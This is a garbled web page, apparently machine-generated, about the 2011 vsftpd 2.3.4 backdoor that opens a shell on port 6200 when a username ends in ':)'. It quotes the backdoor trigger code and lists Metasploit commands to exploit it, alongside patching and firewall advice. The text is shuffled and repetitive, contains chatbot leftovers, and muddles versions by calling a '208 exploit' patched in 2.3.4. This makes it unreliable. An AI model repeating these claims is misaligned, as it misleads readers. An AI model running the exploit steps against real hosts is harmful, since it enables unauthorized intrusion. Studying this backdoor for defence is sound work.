The server would immediately open a listening shell on network port 6200 .
(included by default):
For those already comfortable with the Metasploit Framework:
md5sum /usr/sbin/vsftpd
The good news is that the vsftpd 208 exploit has been patched in vsftpd version 2.3.4 and later. To mitigate the vulnerability, users can update their vsftpd installation to the latest version. vsftpd 208 exploit github link
if ((p_str->p_buf[i] == ':') && (p_str->p_buf[i+1] == ')')) vsf_sysutil_extra(); Use code with caution.
You can test for the backdoor without executing any harmful commands.
In July 2011, unknown attackers compromised the master download server for VSFTPD and replaced the legitimate source code archive for version 2.3.4 with a malicious copy. This altered version contained a classic backdoor: if a user attempted to log in with a username that ended in a smiley face emoticon ( :) ), the server would immediately open a command shell listening on TCP port 6200.
Block port 6200 at the external firewall level to prevent unauthorized access even if a backdoor is triggered internally. The server would immediately open a listening shell
For those looking to understand the mechanics behind the attack, reports are available.
: The official Ruby implementation of the vsftpd 2.3.4 backdoor exploit module used globally by security professionals.
Search for the module: use exploit/unix/ftp/vsftpd_234_backdoor Set the target IP: set RHOSTS [Target_IP] Run the exploit: exploit Remediation and Mitigation
For a broader list of vulnerabilities across different versions (such as the 3.0.2 deny_file bypass), check the GitHub Advisory Database. Summary of Version 2.0.8 if ((p_str->p_buf[i] == ':') && (p_str->p_buf[i+1] == ')'))
A standard Python-based exploit script found on GitHub follows a simple execution flow:
Do you prefer your exploit scripts in , Go , or as a Metasploit module ? What operating system is the target machine running? Share public link
Disclaimer: This information is for educational purposes only and should only be tested in controlled, authorized environments. Step 1: Identify the Target
